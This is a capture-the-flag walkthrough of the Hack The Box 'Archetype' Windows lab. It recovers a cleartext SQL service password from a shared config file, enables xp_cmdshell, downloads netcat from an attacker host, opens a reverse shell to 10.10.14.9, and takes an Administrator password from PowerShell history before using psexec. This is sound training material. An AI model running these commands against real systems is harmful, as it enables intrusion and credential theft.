# Archetype Write-up

# Introduction

Welcome to TIER II! Well done at reaching this point. From now on boxes are becoming a bit more difficult in the context of steps, usage of tools and exploitation attempts as they start looking similar to the boxes in the main platform of HTB. Starting with Archetype which is a Windows machine, you can have a chance to exploit a misconfiguration in Microsoft SQL Server, try getting a reverse shell and get familiarized with the use of <u>Impacket</u> tool in order to further attack some services.

## Enumeration

Performing a network scan to detect what ports are open is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks. As in most cases we are going to use the famous <code>nmap</code> tool:

nmap -sC -sV {TARGET\_IP}

### •••

```
nmap -sC -sV {TARGET IP}
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 15:00 CEST
Nmap scan report for {TARGET_IP}
Host is up (0.13s latency).
Not shown: 996 closed ports
         STATE SERVICE
                           VERSION
PORT
135/tcp open msrpc
                           Microsoft Windows RPC
              netbios-ssn Microsoft Windows netbios-ssn
139/tcp open
              microsoft-ds Windows Server 2019 Standard 17763
445/tcp open
microsoft-ds
1433/tcp open ms-sql-s
                           Microsoft SQL Server 2017 14.00.1000.00;
RTM
 ms-sql-ntlm-info:
   Target_Name: ARCHETYPE
   NetBIOS_Domain_Name: ARCHETYPE
   NetBIOS_Computer_Name: ARCHETYPE
   DNS_Domain_Name: Archetype
    DNS_Computer_Name: Archetype
```

```
Product_Version: 10.0.17763
ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-07-27T12:45:57
| Not valid after: 2051-07-27T12:45:57
[_ssl-date: 2021-07-27T13:00:32+00:00; 0s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE:
cpe:/o:microsoft:windows
Host script results:
[_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s
 ms-sql-info:
   {TARGET IP}:1433:
     Version:
        name: Microsoft SQL Server 2017 RTM
        number: 14.00.1000.00
       Product: Microsoft SQL Server 2017
       Service pack level: RTM
        Post-SP patches applied: false
     TCP port: 1433
smb-os-discovery:
   OS: Windows Server 2019 Standard 17763 (Windows Server 2019
Standard 6.3)
   Computer name: Archetype
   NetBIOS computer name: ARCHETYPE\x00
   Workgroup: WORKGROUP\x00
   System time: 2021-07-27T06:00:25-07:00
 smb-security-mode:
   account_used: guest
   authentication_level: user
   challenge_response: supported
   message_signing: disabled (dangerous, but default)
 smb2-security-mode:
   2.02:
     Message signing enabled but not required
 smb2-time:
   date: 2021-07-27T13:00:26
l_ start_date: N/A
```

We found that SMB ports are open and also that a Microsoft SQL Server 2017 is running on port 1433. We are going to enumerate the SMB with the tool smbclient:

```
smbclient -N -L \\\\{TARGET_IP}\\
-N : No password
-L : This option allows you to look at what services are available on a server
```

•••		
smbclient -N -L `	\\\{TARGET	_IP}\\
Sharename	Туре	Comment
ADMIN\$ backups	Disk Disk	Remote Admin
C\$	Disk	Default share
IPC\$	IPC	Remote IPC
SMB1 disabled	no workgro	up available

We located a couple of interesting shares. Shares ADMIN\$ & C\$ cannot be accessed as the Access Denied error states, however, we can try to access and enumerate the backups share by using the following command:

```
smbclient -N \\\\{TARGET_IP}\\backups
```

```
smbclient -N \\\\{TARGET_IP}\\backups
Try "help" to get a list of possible commands.
smb: \> dir
                                     D
                                              0 Mon Jan 20 13:20:57 2020
                                     D
                                              0 Mon Jan 20 13:20:57 2020
                                                 Mon Jan 20 13:23:02 2020
  prod.dtsConfig
                                    AR
                                            609
       5056511 blocks of size 4096. 2393077 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (2,7
KiloBytes/sec) (average 2,7 KiloBytes/sec)
smb: \> exit
```

There is a file named prod.dtsConfig which seems as a configuration one. We can download it to our local machine by using the get command for further offline inspection. Here's the contents of it:



By reviewing the content of this configuration file, we spot in cleartext the password of the user sql\_svc, which is M3g4c0rp123, for the host ARCHETYPE. With the provided credentials we just need a way to connect and authenticate to the MSSQL server. Impacket tool includes a valueable python script called mssglclient.py which offers such a functionality.

But first we should better understand what Impactet is and how we can install it. As the author states:

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

We can find and download it from the following link:

https://github.com/SecureAuthCorp/impacket

A quick installation guide is provided before we can use it.

```
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install .
# OR:
sudo python3 setup.py install
# In case you are missing some modules:
pip3 install -r requirements.txt
```

Note: In case you don't have pip3 (pip for Python3) installed, or Python3, install it with the following commands: sudo apt install python3 python3-pip

Now we are ready to learn about the usage of the tool and specifically of the mssqlclient.py script:

python3 mssqlclient.py -h

```
python3 mssqlclient.py -h
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
usage: mssqlclient.py [-h] [-port PORT] [-db DB] [-windows-auth] [-debug] [-file
FILE] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address]
target
TDS client implementation (SSL supported).
positional arguments:
                        [[domain/]username[:password]@]<targetName or address>
  target
optional arguments:
  -h, --help
                        show this help message and exit
  -port PORT
                        target MSSQL port (default 1433)
  -db DB
                        MSSQL database instance (default None)
                       whether or not to use Windows Authentication (default False)
  -windows-auth
 -debug
                        Turn DEBUG output ON
  -file FILE
                        input file with commands to execute in the SQL shell
authentication:
  -hashes LMHASH:NTHASH
                       NTLM hashes, format is LMHASH:NTHASH
                        don't ask for password (useful for -k)
  -no-pass
                        Use Kerberos authentication. Grabs credentials from ccache
  -k
file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found,
it will use the ones specified in the command line
                        AES key to use for Kerberos Authentication (128 or 256 bits)
  -aesKey hex key
                        IP Address of the domain controller. If ommited it use the
  -dc-ip ip address
domain part (FQDN) specified in the target parameter
```

After understanding the options provided, we can try to connect to the MSSQL server by issuing the following command:

python3 mssqlclient.py ARCHETYPE/sql\_svc@{TARGET\_IP} -windows-auth

We provide the password we spotted previously in the configuration file:

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python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation	
<pre>Password: [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'. [*] INFO(ARCHETYPE): Line 1: Changed language setting to us_engliss [*] ACK: Result: 1 - Microsoft SQL Server (140 3232) [!] Press help for extra shell commands SQL&gt;</pre>	h.

We successfully authenticated to the Microsoft SQL Server!

### Foothold

After our successful connection it is advisable to further check the help option of our SQL shell:

•••	
SQL> help	
<pre>lcd {path} exit enable_xp_cmdshell disable_xp_cmdshell xp_cmdshell {cmd} sp_start_job {cmd} ! {cmd}</pre>	<ul> <li>changes the current local directory to {path}</li> <li>terminates the server process (and this session)</li> <li>you know what it means</li> <li>you know what it means</li> <li>executes cmd using xp_cmdshell</li> <li>executes cmd using the sql server agent (blind</li> <li>executes a local shell cmd</li> </ul>

The help option describes the very basic of the functionalities it offers, which means that we need to perform further research on this in order to understand the inner-workings of each feature.

Here's two great articles that can guide us further to our exploration journey with MSSQL Server: <u>https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server</u> <u>https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet</u> As a first step we need to check what is the role we have in the server. We will use the command found in the above cheatsheet:

SELECT is\_srvrolemember('sysadmin');



The output is 1, which translates to True.

In previous cheatsheets, we found also how to set up the command execution through the xp\_cmdshell:

```
EXEC xp_cmdshell 'net user'; - privOn MSSQL 2005 you may need to reactivate xp_cmdshell
first as it's disabled by default:
EXEC sp_configure 'show advanced options', 1; - priv
RECONFIGURE; - priv
EXEC sp_configure 'xp_cmdshell', 1; - priv
RECONFIGURE; - priv
```

First it is suggested to check if the xp\_cmdshell is already activated by issuing the first command:

SQL> EXEC xp\_cmdshell 'net user';

### •••

SQL> EXEC xp\_cmdshell 'net user';

[-] ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp\_cmdshell' of component 'xp\_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp\_cmdshell' by using sp\_configure. For more information about enabling 'xp\_cmdshell', search for 'xp\_cmdshell' in SQL Server Books Online. Indeed is not activated. For this reason we will need to proceed with the activation of xp\_cmdshell as follows:

```
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure; - Enabling the sp_configure as stated in the above error message
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
```

•••

SQL> EXEC sp\_configure 'show advanced options', 1;

access check cache bucket count	0	65536	0	0
access check cache quota	0	2147483647	0	0
Ad Hoc Distributed Queries	0	1	0	0
- -OUTPUT SNIPPET-> -				
user connections	0	32767	0	0
user options	0	32767	0	0
xp_cmdshell	0	1	0	0

SQL> EXEC sp\_configure 'xp\_cmdshell', 1; [\*] INF0(ARCHETYPE): Line 185: Configuration option 'xp\_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. SQL> RECONFIGURE; SQL>

Now we are able to execute system commands:

SQL> xp_cmdshell "whoami"	
output	
archetype\sql_svc	
NULL	
SQL>	

Finally we managed to get a command execution!

Now, we will attempt to get a stable reverse shell. We will upload the nc64.exe binary to the target machine and execute an interactive cmd.exe process on our listening port.

We can download the binary from <u>here</u>.

We navigate to the folder and then start the simple HTTP server, then the netcat listener in a different tab by using the following commands:

```
sudo python3 -m http.server 80
```

sudo nc -lvnp 443

In order to upload the binary in the target system, we need to find the appropriate folder for that. We will be using **PowerShell** for the following tasks since it gives us much more features then the regular command prompt. In order to use it, we will have to specify it each time we want to execute it until we get the reverse shell. To do that, we will use the following syntax: **powershell** -c command

The **–**c flag instructs the powershell to execute the command.

We will print the current working directory by issuing the following:

```
xp_cmdshell "powershell -c pwd"
```

SQL> xp_cmdshell "powershell -c pwd"
output
NULL
Path
$(\cdot)$ Windows) system 22
C. (wthuows (systemsz

As a user archetype\sql\_svc, we don't have enough privileges to upload files in a system directory and only user Administrator can perform actions with higher privileges. We need to change the current working directory somewhere in the home directory of our user where it will be possible to write. After a quick enumeration we found that Downloads is working perfectly for us to place our binary. In order to do that, we are going to use the wget tool within PowerShell:

```
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget
http://10.10.14.9/nc64.exe -outfile nc64.exe"
```

We can verify on our simple Python HTTP server that the target machine indeed performed the request:



Now, we can bind the cmd.exe through the nc to our listener:

SQL> xp\_cmdshell "powershell -c cd C:\Users\sql\_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.9 443"

Finally looking back at our netcat listener we can confirm our reverse shell and our foothold to the system:

••• nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.9] from (UNKNOWN) [10.129.95.187] 49719 Microsoft Windows [Version 10.0.17763.2061] (c) 2018 Microsoft Corporation. All rights reserved. C:\Users\sql\_svc\Downloads>whoami whoami archetype\sql\_svc C:\Users\sql\_svc\Downloads>

The user flag can be found in the user's Desktop:

```
• • •
C:\Users\sql_svc\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F
 Directory of C:\Users\sql_svc\Desktop
01/20/2020 06:42 AM
                       <DIR>
01/20/2020 06:42 AM
                       <DIR>
                                       • •
02/25/2020 07:37 AM
                                   32 user.txt
              1 File(s)
                                    32 bytes
               2 Dir(s) 9,982,980,096 bytes free
C:\Users\sql_svc\Desktop>
```

# **Privilege Escalation**

For privilege escalation, we are going to use a tool called winPEAS, which can automate a big part of the enumeration process in the target system. You can find more information for enumerating Windows system for Privilege Escalation paths in the HTB academy module <u>Windows Privilege Escalation</u>.



It is possible to download winpeas from <u>here</u>. We will transfer it to our target system by using once more the Python HTTP server:

python3 -m http.server 80

On the target machine, we will execute the wget command in order to download the program from our system. We will use powershell for all our commands:

```
powershell
wget http://10.10.14.9/winPEASx64.exe -outfile winPEASx64.exe
```

#### •••

C:\Users\sql\_svc\Downloads>powershell powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\sql\_svc\Downloads> wget http://10.10.14.9/winPEASx64.exe -outfile winPEASx64.exe

wget http://10.10.14.9/winPEASx64.exe -outfile winPEASx64.exe
PS C:\Users\sql\_svc\Downloads> ls

Directory: C:\Users\sql\_svc\Downloads

Mode	LastWrite	Time	Length	Name
-a	7/30/2021 2:3	O AM	45272	nc64.exe
-a	//30/2021 3:2	.3 AM	10/8330	winPEASx64.exe

We successfully downloaded the binary. To execute it, we will do the following:

```
PS C:\Users\sql_svc\Downloads> .\winPEASx64.exe
```

**Note:** The output of the tool is long, here you will see just the small part of the output.

Here's the important part of the output:



From the output we can observer that we have SeImpersonatePrivilege (more information can be found <u>here</u>), which is also vulnerable to juicy potato exploit. However, we can first check the two existing files where credentials could be possible to be found.

As this is a normal user account as well as a service account, it is worth checking for frequently access files or executed commands. To do that, we will read the PowerShell history file, which is the equivalent of .bash\_history for Linux systems. The file ConsoleHost\_history.txt can be located in the directory C:\Users\sql\_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\.

We can navigate to the folder where the PowerShell history is stored:

•••			
PS C:\Users PS C:\Users PS C:\Users Directo	s\sql_svc> cd AppData s\sql_svc\AppData> cd Roamir s\sql_svc\AppData\Roaming\Mi ory: C:\Users\sql_svc\AppDat	ng\Microsoft\Windows\PowerShell\PSReadline\ icrosoft\Windows\PowerShell\PSReadline> dir ta\Roaming\Microsoft\Windows\PowerShell\PSReadline	
Mode	LastWriteTime	Length Name	
 -ar	3/17/2020 2:36 AM	79 ConsoleHost_history.txt	

To read the file, we will type type ConsoleHost\_history.txt:



We got in cleartext the password for the Administrator user which is MEGACORP\_4dm1n!!

We can now use the tool psexec.py again from the Impacket suite to get a shell as the administrator:

```
python3 psexec.py administrator@{TARGET_IP}
```



The root flag can now be found in the Desktop of the Administrator user:

C:\Users\Ad	C:\Users\Administrator\Desktop>dir					
Volume in Volume Ser	Volume in drive C has no label. Volume Serial Number is 9565-0B4F					
Directory	of C:\Users	\Administra	ator\Desktop			
07/27/2021 07/27/2021 02/25/2020	02:30 AM 02:30 AM 07:36 AM 1 File(9 2 Dir(s	<dir> <dir> s) ) 10,178,2</dir></dir>	32 root.txt 32 bytes 293,760 bytes free			

Finally we managed to get both flags, congratulations!